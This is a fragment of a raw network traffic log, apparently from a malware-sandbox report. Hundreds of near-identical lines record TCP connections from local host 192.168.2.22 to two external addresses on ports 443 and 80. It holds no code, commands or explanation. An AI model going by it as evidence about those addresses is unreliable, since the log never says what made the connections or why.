                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.240:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 185.29.10.52:80
                  Source: global trafficTCP traffic: 185.29.10.52:80 -> 192.168.2.22:49161
